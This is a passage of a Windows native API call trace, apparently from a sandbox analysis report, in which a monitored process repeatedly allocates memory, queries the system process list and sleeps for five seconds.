RegionSize=0xdea54*=0x20000) returned 0x0 [0228.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.321] 